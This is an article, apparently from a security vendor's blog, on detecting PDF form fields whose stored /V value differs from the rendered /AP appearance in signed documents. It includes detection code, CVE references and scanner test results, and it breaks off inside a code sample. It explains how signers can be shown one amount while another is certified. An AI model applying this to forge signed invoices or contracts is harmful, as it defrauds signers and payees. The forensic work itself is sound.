PDF Forms as Executable Security Boundaries: V/AP Divergence, DocMDP, and What Gets Certified

Q: What does /NeedAppearances true mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate appearance streams from the /V field values at document open time, so the /AP streams stored on disk are treated as stale. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer displays an appearance regenerated from /V after opening. The provenance of what is displayed and what was certified is therefore always structurally different, even when the two happen to look the same.

Q: What is the difference between a PDF form field's /V value and its /AP /N appearance stream?

/V is the field's machine-readable value: a string or name object (or an array of strings for a multi-select listbox) read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream that the viewer decompresses and renders as pixels; it is what the user sees on screen. The two are authored independently and neither is derived from the other. Only the viewer reads /AP; everything else reads /V.

Q: Which PDF authoring tools produce legitimate /NeedAppearances true documents?

Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents. Examples include mail-merge pipelines, PDF form-fill libraries, and e-signature platforms that prioritise speed over appearance stream completeness (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented). On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, a combination legitimate tooling rarely produces. Running qpdf --generate-appearances before signing removes the condition: qpdf regenerates appearance streams from the current /V values and clears the flag. qpdf documents its appearance generation as limited, so the regenerated appearances should still be checked before the document is signed.

New — population-scale companion: PDF Forensics at Scale runs the scanner against 1,572 real-world PDFs — including 400 live malware samples — reporting live-malware detection, the real-world false-positive rate, and the files that crash a scanner (and how the engine was hardened).

Background: Two Data Paths, One Signature

In auditing the incremental-update logic in our PDF forensics scanner we identified a gap: the set-difference approach to injected object detection silently passed redefined objects carrying the same object ID. Fixing that led into a deeper examination of DocMDP — how certified signatures interact with permitted incremental updates. That work surfaced a more fundamental structural problem: the relationship between what a PDF AcroForm field displays and what it stores as machine-readable data. This article documents the V/AP problem in full.

Every AcroForm field has two independent data stores:

Key	What it contains	Who reads it
`/V`	The machine-readable field value	JavaScript (`doc.getField().value`), form submission (`SubmitForm`), digital signature byte-range hash
`/AP /N`	A self-contained PDF content stream that the viewer renders as pixels	The viewer, the user — nothing else

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Prior Research and Known Exploitation

The structural relationship between signed PDF content and rendered output has been studied in the academic literature. Mainka, Mladenov, Rohlmann, and Schwenk published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs” (NDSS 2021), identifying three attack classes — Hide, Hide-and-Replace, and Replace — that exploit the gap between the byte range a signature covers and the content the viewer renders. The disclosure reached 28 PDF viewer vendors and produced patches across Adobe Acrobat, Foxit, LibreOffice, and others. An earlier line of research by Müller, Mladenov, Somorovsky, and Schwenk (“PDF Insecurity” series, 2017–2019) systematically mapped signature-validation weaknesses across major PDF viewers, establishing the framework that later Shadow Attack work built on. ISO 32000-2:2020 introduced clarifications in response to some of these findings, though the V/AP structural separation itself is a fundamental consequence of the format’s design, not a defect that can be patched at the specification level.

In operational settings, the same mechanism is directly applicable to invoice fraud and signed financial workflows: a signed invoice PDF where an automated payment system reads /V while the human signer saw what /AP rendered. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact — no modification of the signed byte range is required, and no viewer warning is produced.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

CVE	Pattern	Mechanism
CVE-2021-28550 APSB21-29	AcroForm + `getField` / `setFocus` JavaScript	Use-after-free in Acrobat’s form field manipulation path, triggered by specific `getField()` and `setFocus()` call sequences in AcroForm JavaScript
CVE-2021-21017 APSB21-09	XFA + JavaScript + `instanceManager`	Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat
CVE-2024-45112 APSB24-70	XFA/AcroForm mixed field access	Type confusion triggered when a document mixes XFA and AcroForm field access in the same session — a pattern not present in legitimately authored forms
CVE-2023-21608 APSB23-01	Annotation + `event.target` JavaScript	Use-after-free in the annotation engine triggered via `event.target` references in AcroForm field event handlers (CVSS 7.8)

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open. XFA scripting is structurally separate from AcroForm JavaScript: a scanner inspecting only AcroForm paths may not examine XFA-embedded FormCalc or JavaScript at all, since the execution model and content location differ between the two form architectures.

Threat Perspective: Where V/AP Analysis Fits

PDF-delivered threats exist across a wide spectrum of sophistication. The overwhelming majority of malicious PDFs observed in the wild do not involve form field structure at all. The high-volume threat classes are:

Phishing overlays — a rendered page that prompts for credentials or directs the user to an external URL. No AcroForm required; often no JavaScript.
Social engineering — instructions to enable content, call a number, scan a QR code, or download an attached file. Relies on user behavior, not structural manipulation.
JavaScript exploits targeting Acrobat’s engine — CVE-2008-2992, CVE-2009-0927, CVE-2018-4990, and more recent entries. These use JavaScript as a delivery mechanism but typically do not depend on form field data.
Embedded payloads via /EmbeddedFile streams, /Launch actions, or polyglot structures that contain executable content.

These are high-volume, operationally dominant attacks. They are detected through URL analysis, embedded file inspection, static JavaScript analysis, YARA pattern matching, and ClamAV signatures — not V/AP structural comparison. Commodity phishing PDFs do not need form field manipulation. They exploit user trust, not signing semantics.

V/AP divergence analysis is relevant to a different, narrower threat class: documents where the PDF form carries legal or financial authority, and where an attacker benefits from the gap between what a human reader sees and what a machine processes. The applicable scenarios are:

Scenario	Why V/AP matters	Where simpler analysis is sufficient
Signed financial contract	Signer’s view may differ from submitted field values; digital signature certifies both	Unsigned documents, including phishing PDFs, don’t need this analysis
Automated invoice processing	Payment pipeline reads `/V` for transaction amount; AP renders a different figure	Phishing invoices asking users to wire funds directly don’t need form manipulation
Regulatory or legal submission	The certified content is referenced by downstream systems as authoritative	Drive-by malware delivery doesn’t require form field structure
E-signature platform forensics	Contested signed documents require structural audit of what the byte range actually certified	Standard AV/EDR scanning handles most commodity threats at this layer

Being explicit about scope is part of being accurate. The structural indicators in this article are most applicable to high-value signed document workflows and forensic analysis of contested PDFs. They are not the right primary tool for blocking commodity phishing PDFs, which are better addressed by URL reputation, sender analysis, and static JS inspection. Both are necessary; they target different points on the threat spectrum.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are therefore treated as stale: they may not reflect /V. On its own this is medium severity, because stale AP is common in programmatic form-fill workflows that update /V but skip AP regeneration before saving, such as mail-merge tools and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented).

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP. The viewer regenerates the appearance after opening. The signed content and the displayed content are structurally separated — the viewer regenerates appearance from /V at open time, so what is displayed is never the signed /AP stream. The visual output may agree if /V and the stale /AP happen to contain the same value, but the provenance of what is displayed and what is certified is always structurally different.
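The compound rule can be sketched as a regex pass over raw bytes, in keeping with the no-rendering constraint. This is a minimal illustration, not the scanner's code: the function and pattern names are hypothetical, either a /FT /Sig field or a /DocMDP entry is assumed to indicate a signature, and objects stored inside compressed object streams (/ObjStm) are not visible to it.

```python
import re
from typing import Optional

# Hypothetical patterns for a raw-bytes pass; objects inside compressed
# /ObjStm streams are not visible to them.
NEED_APPEARANCES = re.compile(rb"/NeedAppearances\s+true\b")
SIG_FIELD = re.compile(rb"/FT\s*/Sig\b")
DOCMDP = re.compile(rb"/DocMDP\b")


def need_appearances_severity(pdf_bytes: bytes) -> Optional[str]:
    """Return None, "medium" or "critical" for the /NeedAppearances condition."""
    if not NEED_APPEARANCES.search(pdf_bytes):
        return None
    signed = bool(SIG_FIELD.search(pdf_bytes) or DOCMDP.search(pdf_bytes))
    # Stale /AP on its own is common in form-fill pipelines (medium); inside a
    # signed document the displayed appearance never comes from the certified
    # /AP stream, so the combination is escalated.
    return "critical" if signed else "medium"
```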

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the simplest V/AP check to verify: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.
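A minimal sketch of the dictionary-key comparison, assuming the widget dictionary's raw bytes have already been located through the xref. Names such as `checkbox_vas_mismatch` are hypothetical. It decodes #xx escapes so that /Y#65s and /Yes compare equal, and it only covers checkboxes whose field and widget share one dictionary: for radio groups, /V sits on the parent field and unselected kids legitimately carry /AS /Off, so a real check would compare /V against each kid's on-state instead.

```python
import re
from typing import Optional, Tuple

# A PDF name runs until whitespace or a delimiter (ISO 32000-1 §7.3.5).
_NAME_BODY = rb"([^\s/<>\[\]()%{}]+)"


def _decode_name(raw: bytes) -> str:
    # Names may encode bytes as #xx, so /Y#65s and /Yes are the same name.
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def name_entry(widget: bytes, key: bytes) -> Optional[str]:
    """Return the name value stored under /key in a raw dictionary, if any."""
    m = re.search(rb"/" + key + rb"\s*/" + _NAME_BODY, widget)
    return _decode_name(m.group(1)) if m else None


def checkbox_vas_mismatch(widget: bytes) -> Optional[Tuple[str, str]]:
    """Return (V, AS) when both are present and disagree, else None."""
    v, state = name_entry(widget, b"V"), name_entry(widget, b"AS")
    if v is None or state is None or v == state:
        return None
    return v, state
```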

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.
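The extraction step might look roughly like the following sketch. It swaps PyMuPDF for `zlib` (so only /FlateDecode is decoded), maps shown bytes to characters as latin-1 without consulting the font's encoding, and joins separate show operators with a space before whitespace normalisation; the function names are hypothetical. It does implement the literal-string escapes (`\n`, `\(`, `\ddd` octal, line continuation) and hex strings that PDF-unescaping has to cover.

```python
import re
import zlib
from typing import List, Tuple

_ESC = {ord("n"): b"\n", ord("r"): b"\r", ord("t"): b"\t", ord("b"): b"\b", ord("f"): b"\f"}
_TOKEN = re.compile(rb"<<|>>|/?[^\s()<>\[\]{}/%]+|.", re.DOTALL)
_NUMBER = re.compile(rb"[+-]?(\d+\.?\d*|\.\d+)")
_TEXT_SHOW = {b"Tj", b"'", b'"'}


def decode_ap_stream(raw: bytes, stream_dict: bytes) -> bytes:
    # Assumption: only /FlateDecode is handled (the scanner itself uses PyMuPDF).
    return zlib.decompress(raw) if b"/FlateDecode" in stream_dict else raw


def _literal(data: bytes, i: int) -> Tuple[bytes, int]:
    """Unescape the literal string whose '(' is at data[i]; return (bytes, next index)."""
    out, depth = bytearray(), 0
    while i < len(data):
        ch = data[i]
        if ch == 0x5C:  # backslash escape
            nxt = data[i + 1] if i + 1 < len(data) else None
            if nxt is None:
                break
            if nxt in _ESC:
                out += _ESC[nxt]
                i += 2
            elif 0x30 <= nxt <= 0x37:  # \ddd octal, one to three digits
                j = i + 1
                while j < min(i + 4, len(data)) and 0x30 <= data[j] <= 0x37:
                    j += 1
                out.append(int(data[i + 1:j], 8) & 0xFF)
                i = j
            elif nxt in (0x0A, 0x0D):  # backslash + end-of-line: continuation
                i += 2
                if nxt == 0x0D and i < len(data) and data[i] == 0x0A:
                    i += 1
            else:  # \( \) \\ and unknown escapes keep the character
                out.append(nxt)
                i += 2
            continue
        if ch == 0x28:
            depth += 1
            if depth > 1:
                out.append(ch)
        elif ch == 0x29:
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
            out.append(ch)
        else:
            out.append(ch)
        i += 1
    return bytes(out), i


def extract_ap_text(content: bytes) -> str:
    """Concatenate the strings shown by Tj, TJ, ' and " in a decoded content stream."""
    shown: List[bytes] = []
    strings: List[bytes] = []  # string operands seen since the last operator
    i = 0
    while i < len(content):
        ch = content[i]
        if ch == 0x28:  # literal string
            s, i = _literal(content, i)
            strings.append(s)
        elif ch == 0x3C and content[i + 1:i + 2] != b"<":  # hex string
            end = content.find(b">", i)
            if end == -1:
                break
            digits = re.sub(rb"\s", b"", content[i + 1:end])
            digits += b"0" * (len(digits) % 2)  # odd count: trailing 0 implied
            strings.append(bytes.fromhex(digits.decode("ascii")))
            i = end + 1
        elif ch == 0x25:  # comment: skip to end of line
            while i < len(content) and content[i] not in (0x0A, 0x0D):
                i += 1
        elif chr(ch).isspace() or ch in (0x5B, 0x5D):  # whitespace, '[' and ']'
            i += 1
        else:
            m = _TOKEN.match(content, i)
            tok, i = m.group(), m.end()
            if tok.startswith(b"/") or _NUMBER.fullmatch(tok) or tok in (b"<<", b">>"):
                continue  # names, numbers and dict delimiters are ignored operands
            if tok in _TEXT_SHOW and strings:
                shown.append(strings[-1])
            elif tok == b"TJ" and strings:
                shown.append(b"".join(strings))
            strings.clear()  # any other token is an operator
    # Assumption: bytes map to characters via latin-1 (no font encoding resolved).
    return " ".join(" ".join(s.decode("latin-1") for s in shown).split())
```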

Three encoding cases are handled:

Literal string /V — /V (Hello) — extracted directly
Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison
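Decoding the three /V shapes can be sketched as follows. The helpers are hypothetical, non-Unicode strings are approximated as latin-1 rather than true PDFDocEncoding, and joining array elements with a single space is an assumption chosen to line up with whitespace normalisation on the AP side. The UTF-8 branch covers the byte-order-marked UTF-8 text strings that PDF 2.0 permits.

```python
from typing import Optional, Tuple

_ESC = {ord("n"): b"\n", ord("r"): b"\r", ord("t"): b"\t", ord("b"): b"\b", ord("f"): b"\f"}


def _literal(data: bytes, i: int) -> Tuple[bytes, int]:
    """Unescape the literal string whose '(' is at data[i]; return (bytes, next index)."""
    out, depth = bytearray(), 0
    while i < len(data):
        ch = data[i]
        if ch == 0x5C:  # backslash escape
            nxt = data[i + 1] if i + 1 < len(data) else None
            if nxt is None:
                break
            if nxt in _ESC:
                out += _ESC[nxt]
                i += 2
            elif 0x30 <= nxt <= 0x37:  # \ddd octal
                j = i + 1
                while j < min(i + 4, len(data)) and 0x30 <= data[j] <= 0x37:
                    j += 1
                out.append(int(data[i + 1:j], 8) & 0xFF)
                i = j
            else:  # \( \) \\ and unknown escapes keep the character
                out.append(nxt)
                i += 2
            continue
        if ch == 0x28:
            depth += 1
            if depth > 1:
                out.append(ch)
        elif ch == 0x29:
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
            out.append(ch)
        else:
            out.append(ch)
        i += 1
    return bytes(out), i


def _next_string(data: bytes, i: int) -> Tuple[Optional[bytes], int]:
    """Return the next literal or hex string at or after index i."""
    while i < len(data) and data[i] not in (0x28, 0x3C):  # '(' or '<'
        i += 1
    if i >= len(data):
        return None, i
    if data[i] == 0x28:
        return _literal(data, i)
    end = data.find(b">", i)
    if end == -1:
        return None, len(data)
    digits = bytes(c for c in data[i + 1:end] if not chr(c).isspace())
    digits += b"0" * (len(digits) % 2)  # odd count: a trailing 0 is implied
    return bytes.fromhex(digits.decode("ascii")), end + 1


def decode_text_string(raw: bytes) -> str:
    if raw.startswith(b"\xfe\xff"):  # UTF-16BE with byte-order mark
        return raw[2:].decode("utf-16-be")
    if raw.startswith(b"\xef\xbb\xbf"):  # UTF-8 text strings (PDF 2.0)
        return raw[3:].decode("utf-8")
    return raw.decode("latin-1")  # approximation of PDFDocEncoding


def parse_v(value: bytes) -> str:
    """Decode the syntax after /V: (literal), <hex>, or an array of either."""
    value = value.strip()
    if value.startswith(b"["):
        items, i = [], 1
        while True:
            s, i = _next_string(value, i)
            if s is None:
                break
            items.append(decode_text_string(s))
        return " ".join(items)  # assumption: elements joined with a space
    s, _ = _next_string(value, 0)
    return decode_text_string(s) if s is not None else ""
```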

For listbox and combobox fields, /Opt can store export/display pairs, with the export value first in each pair (ISO 32000-1 §12.7.4.4): [[(us) (United States)] [(uk) (United Kingdom)]]. The /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.
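The export-to-display substitution, sketched under the assumption that /Opt has already been parsed into Python strings (a bare string is an option whose export value and label coincide). `comparison_target` is a hypothetical name, and the space-joining of multi-select values is an assumption matching the AP-side normalisation.

```python
from typing import Dict, List, Sequence, Union

OptEntry = Union[str, Sequence[str]]


def opt_display_map(opt: List[OptEntry]) -> Dict[str, str]:
    """Map export value -> display label; a pair is [export, display]."""
    mapping: Dict[str, str] = {}
    for entry in opt:
        if isinstance(entry, str):  # check str first: a str is also a Sequence
            mapping[entry] = entry
        else:
            mapping[entry[0]] = entry[1]
    return mapping


def comparison_target(v: Union[str, List[str]], opt: List[OptEntry]) -> str:
    """The text the /AP stream is expected to render for a given /V."""
    labels = opt_display_map(opt)
    values = v if isinstance(v, list) else [v]
    return " ".join(labels.get(x, x) for x in values)
```

A /V of `us` is then compared against `United States` rather than against the raw export value.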

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.
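The blank-AP flag, and the image-based AP flag reported as Finding 4 further down, both reduce to an operator census over the decoded stream. A minimal sketch with hypothetical names: strings and comments are blanked first so that text such as `(Tj)` cannot masquerade as an operator. Note that `Do` can invoke either an image or a form XObject, and a form XObject may itself draw text, so a fuller check would resolve the XObject's /Subtype before calling the appearance image-based.

```python
import re

_TEXT_OPS = {b"Tj", b"TJ", b"'", b'"'}


def _strip_strings_and_comments(content: bytes) -> bytes:
    """Blank out strings and comments so their contents cannot look like operators."""
    out, i, n = bytearray(), 0, len(content)
    while i < n:
        ch = content[i]
        if ch == 0x28:  # literal string: skip to the balancing ')'
            depth = 0
            while i < n:
                c = content[i]
                if c == 0x5C:  # backslash escapes the next byte
                    i += 2
                    continue
                depth += (c == 0x28) - (c == 0x29)
                i += 1
                if depth == 0:
                    break
            out += b" "
        elif ch == 0x3C and content[i + 1:i + 2] != b"<":  # hex string
            end = content.find(b">", i)
            i = n if end == -1 else end + 1
            out += b" "
        elif ch == 0x3C:  # '<<' dictionary delimiter
            out += b"<<"
            i += 2
        elif ch == 0x25:  # comment runs to end of line
            while i < n and content[i] not in (0x0A, 0x0D):
                i += 1
        else:
            out.append(ch)
            i += 1
    return bytes(out)


def classify_ap(content: bytes) -> str:
    """Return "text", "xobject-only" or "blank" for a decoded /AP /N stream."""
    tokens = re.findall(rb"/?[^\s()<>\[\]{}/%]+", _strip_strings_and_comments(content))
    operators = {t for t in tokens if not t.startswith(b"/")}  # drop names
    if operators & _TEXT_OPS:
        return "text"
    if b"Do" in operators:
        return "xobject-only"
    return "blank"
```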

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined — it is not statically present in the file. Different viewers may render different things. Medium severity.
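A sketch of the value-without-appearance condition, assuming the raw bytes of a merged field/widget dictionary. The name `value_without_appearance` is hypothetical; the regex does not handle nested unescaped parentheses inside /V, and a whitespace-only value is treated as empty.

```python
import re

# Literal or hex string after /V; nested unescaped parentheses are not handled.
_V_STRING = re.compile(rb"/V\s*(?:\(((?:[^()\\]|\\.)*)\)|<([0-9A-Fa-f\s]*)>)", re.DOTALL)


def value_without_appearance(widget: bytes) -> bool:
    """True when /V holds a non-blank string but the widget has no /AP entry."""
    m = _V_STRING.search(widget)
    if m is None:
        return False
    body = m.group(1) if m.group(1) is not None else m.group(2)
    return bool(body.strip()) and re.search(rb"/AP\b", widget) is None
```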

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44 — Correlation Engine) fire on combinations:

Combination	Severity	Why
`/NeedAppearances` + digital signature	Critical	The signed bytes cover a different appearance from the one the viewer displays
V/AS mismatch + digital signature	Critical	Displayed state and certified value structurally differ within the same signed byte range
`/NeedAppearances` + JS or SubmitForm	High	Stale AP paired with active form content — the displayed values may differ from what is executed or exfiltrated
`/NeedAppearances` + DocMDP constraint violation	Critical	Uncertified modification rendered visible via viewer-regenerated appearance

Note on test scores: The Critical escalation for /NeedAppearances + digital signature fires only when both conditions are present in the same file. 01_need_appearances.pdf in the test corpus below carries no digital signature; it scores 81 (MEDIUM) — consistent with this table since the signature condition does not apply and the compound Critical indicator does not trigger.
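The all-conditions gating described in the note can be expressed as a small rule table. The flag names below are hypothetical stand-ins for upstream findings, and the engine's weighting is not modelled; the sketch only shows why a lone /NeedAppearances finding cannot reach the Critical compound indicator.

```python
from typing import FrozenSet, Iterable, List, Tuple

# Hypothetical flag names standing in for upstream engine findings.
COMPOUND_RULES: List[Tuple[FrozenSet[str], str, str]] = [
    (frozenset({"need_appearances", "signature"}), "critical", "NeedAppearances + digital signature"),
    (frozenset({"vas_mismatch", "signature"}), "critical", "V/AS mismatch + digital signature"),
    (frozenset({"need_appearances", "active_form"}), "high", "NeedAppearances + JS or SubmitForm"),
    (frozenset({"need_appearances", "docmdp_violation"}), "critical", "NeedAppearances + DocMDP violation"),
]


def compound_findings(flags: Iterable[str]) -> List[Tuple[str, str]]:
    """Fire a compound indicator only when every one of its conditions is present."""
    present = set(flags)
    return [(severity, label) for needed, severity, label in COMPOUND_RULES if needed <= present]
```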

Engine 47 aggregates findings from all upstream engines. V/AP indicators from Engine 25 (AcroForm Field Forensics) feed directly into it alongside signature forensics and JS behavioral emulation results. For the full 47-engine architecture, including how V/AP findings interact with the JS Behavioral Emulator (Engine 41) and Signature Forensics (Engine 21), see the scanner architecture documentation.

Live Detection: Nine Test PDFs, Real Scanner Output

Each structural indicator described above was validated against a minimal hand-crafted PDF targeting that specific condition. One additional control file was built with correctly authored, matching V and AP values to check for false positives. All files were built from raw bytes without any PDF library and submitted to the scanner live. File sizes range from 707 to 1,212 bytes.

Test file	Condition planted	Threat · Deception → Verdict	Indicators (n / severity)	Primary indicator fired
`01_need_appearances.pdf` 758 bytes	`/NeedAppearances true` in AcroForm dict; text field with `/V (12000.00)`, no `/AP`	0 · 20 → suspicious	6 total 4 medium · 2 low	[MEDIUM] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale
`02_checkbox_vap_mismatch.pdf` 941 bytes	Checkbox widget: `/V /Yes` but `/AS /Off`	0 · 25 → suspicious	4 total 1 high · 1 medium · 2 low	[HIGH] AcroForm: Checkbox Field “approved” — Value/Appearance State Mismatch (V=Yes, AS=Off)
`03_text_vap_mismatch.pdf` 913 bytes	Text field: `/V (Rejected)`; AP stream renders “Approved”	0 · 25 → suspicious	4 total 1 high · 1 medium · 2 low	[HIGH] AcroForm: Text Field “status” — Value/Appearance Mismatch
`05_missing_ap.pdf` 742 bytes	Text field: `/V (99750.00)`, no `/AP` key defined	0 · 10 → suspicious	5 total 3 medium · 2 low	[MEDIUM] AcroForm: Text Field “total_amount” — Has Value But No Appearance Stream
`06_js_field_conditioning.pdf` 1,166 bytes	OpenAction JS reading `status` (`/V approved`) and conditionally posting `amount` (`/V 75000.00`) to external URL	260 · 20 → high-risk	14 total 5 critical · 2 high · 5 medium · 2 low	[CRITICAL] OpenAction + JavaScript; [CRITICAL] YARA: Auto-Open + Executable
`07_need_appearances_signed.pdf` 1,206 bytes	`/NeedAppearances true` + structural `/Sig` field + `/DocMDP P=2`; text field `/V (12000.00)`, no `/AP`	260 · 110 → high-risk	17 total 4 critical · 4 high · 6 medium · 3 low	[CRITICAL] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale; [CRITICAL] NeedAppearances + Digital Signature — Certified Content Diverges from Displayed
`E4_image_ap_structural.pdf` 938 bytes	Text field `/V (1200.00)`; AP stream is an image XObject invoked via `Do` — no text operators present	0 · 25 → suspicious	5 total 1 high · 2 medium · 2 low	[HIGH] AcroForm: Text Field “amount” — Image-Based Appearance Stream (V Not Visually Verifiable)
`E5_fieldmdp_empty_fields.pdf` 1,212 bytes	FieldMDP signature with `Action=Include` and empty `/Fields []` array — appears to lock named fields but locks none	245 · 10 → high-risk	14 total 2 critical · 4 high · 5 medium · 3 low	[HIGH] FieldMDP: Include Action With Empty /Fields — Locks Nothing
`00_clean_match.pdf` 707 bytes — control	Text field: `/V (1200.00)`; AP stream renders `1200.00` via `Tj` operator — values agree; no `/NeedAppearances`	0 · 0 → clean	4 total 0 V/AP · 0 threat · structural only	No V/AP indicator fired and no threat: the control is correctly `clean`. The unrelated factors that previously elevated it (empty metadata, and a benign differential-parsing disagreement where MuPDF sees no AcroForm while Poppler/pdfminer do) are now booked to the neutral structural axis and do not affect the verdict. The V/AP structural checks correctly stay silent on a well-formed document.

The differential-parsing disagreement on the control file is itself empirically meaningful: two of the three parsers (Poppler and pdfminer) find an AcroForm in a file that MuPDF treats as having none, so a parser-disagreement indicator fires on a legitimately authored, benign document.

Five scanner findings from the above runs are reproduced verbatim below.

Finding 1 — Text Field V/AP Mismatch

Severity:  HIGH
Indicator: AcroForm: Text Field "status" — Value/Appearance Mismatch
Engine:    AcroForm Field Forensics

Field "status" (xref 5): /V stores "Rejected" but the /AP /N appearance stream
(xref 7) renders "Approved". The viewer displays "Approved"; any form submission,
JavaScript getField() read, or digital signature byte-range will reference
"Rejected". The structural disagreement is provable from the raw PDF object model
without rendering.

Finding 2 — Checkbox V/AS Mismatch

Severity:  HIGH
Indicator: AcroForm: Checkbox Field "approved" — Value/Appearance State Mismatch
           (V=Yes, AS=Off)
Engine:    AcroForm Field Forensics

Field "approved" (xref 5): /V is /Yes (the stored data value) but /AS is /Off
(the appearance-state key that selects which /AP /N entry the viewer renders).
The checkbox appears unchecked to the viewer; the stored value is checked. Both
/V and /AS fall within any signed byte range — the mismatch is by construction
inside certified content.

Finding 3 — Field-Value Seeding in the JS Emulator

The JS field-conditioning test PDF reached a threat score of 260 (high-risk) on static analysis alone. “OpenAction + JavaScript” is a confirmed attack chain, but the threat score stays below the dangerous band, so the verdict is held at high-risk; the aggregate across all axes is 456. The relevant emulator context: Engine 25 (AcroForm Field Forensics) extracted field_values = {"status": "approved", "amount": "75000.00"} from the AcroForm field dictionaries and passed them to the JS emulator stub. Without this seeding, doc.getField('status').value returns '', the condition '' == 'approved' is false, the app.launchURL() branch is never taken, and the emulator reports clean. With the real field values seeded, the condition evaluates as it would in a viewer, and any URL-launch or submit event is emitted with the actual exfiltration payload.
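The effect of seeding can be reproduced in miniature. This Python sketch is not the scanner's emulator: it extracts /T and /V pairs from raw field dictionaries (without unescaping strings), exposes them through a hypothetical `DocStub` that mimics `doc.getField(name).value`, and mirrors the test PDF's branch condition only approximately.

```python
import re
from types import SimpleNamespace
from typing import Dict, Iterable

# Field name (/T) and value (/V as a literal string or a name); escapes are not decoded.
_T = re.compile(rb"/T\s*\(((?:[^()\\]|\\.)*)\)", re.DOTALL)
_V = re.compile(rb"/V\s*(?:\(((?:[^()\\]|\\.)*)\)|/([^\s/<>\[\]()%{}]+))", re.DOTALL)


def extract_field_values(field_dicts: Iterable[bytes]) -> Dict[str, str]:
    values: Dict[str, str] = {}
    for d in field_dicts:
        t, v = _T.search(d), _V.search(d)
        if t and v:
            raw = v.group(1) if v.group(1) is not None else v.group(2)
            values[t.group(1).decode("latin-1")] = raw.decode("latin-1")
    return values


class DocStub:
    """Hypothetical stand-in for Acrobat's `doc` object inside a JS emulator."""

    def __init__(self, field_values: Dict[str, str]):
        self._values = field_values

    def getField(self, name: str) -> SimpleNamespace:  # camelCase mirrors the JS API
        # Unseeded fields read as "", like the unseeded emulator described above.
        return SimpleNamespace(value=self._values.get(name, ""))


def launch_branch_taken(doc: DocStub) -> bool:
    # Approximate Python mirror of the test PDF's condition:
    # if (doc.getField('status').value == 'approved') app.launchURL(...)
    return doc.getField("status").value == "approved"
```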

Finding 4 — Image-Based AP Structural Flag

Severity:  HIGH
Indicator: AcroForm: Text Field "amount" — Image-Based Appearance Stream
           (V Not Visually Verifiable)
Engine:    AcroForm Field Forensics

Field "amount": /V stores "1200.00" but the /AP /N stream (xref 5) contains
only a Do operator invoking an image XObject (xref 6) — no Tj or TJ text
operators are present. The viewer renders a rasterised image; the stored /V
value is not derivable from the AP stream without image recognition. The
structural anomaly is deterministic: Do present, text operators absent.
Manual review required to confirm whether the image content matches /V.

Finding 5 — FieldMDP Include Action With Empty Fields

Severity:  HIGH
Indicator: FieldMDP: Include Action With Empty /Fields — Locks Nothing
Engine:    Named Tree and Action Forensics

/TransformMethod /FieldMDP with Action=Include and /Fields []. An Include
action with an explicit field list locks only the named fields; an empty
list locks none. The signature structure certifies the document while
leaving every AcroForm field modifiable post-signing. Validators that
check for FieldMDP presence without inspecting the locked-field set will
report a valid field-integrity certification that provides none.
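A sketch of the structural test behind Finding 5, assuming the raw bytes of the signature reference dictionary (including its /TransformParams) are at hand. The function name is hypothetical. ISO 32000-1 requires the /Fields array when /Action is /Include or /Exclude; this sketch does not resolve an indirect /Fields reference and does not treat a missing array as a finding.

```python
import re


def fieldmdp_locks_nothing(sig_ref: bytes) -> bool:
    """True for a FieldMDP reference whose Include list is an empty array."""
    if not re.search(rb"/TransformMethod\s*/FieldMDP\b", sig_ref):
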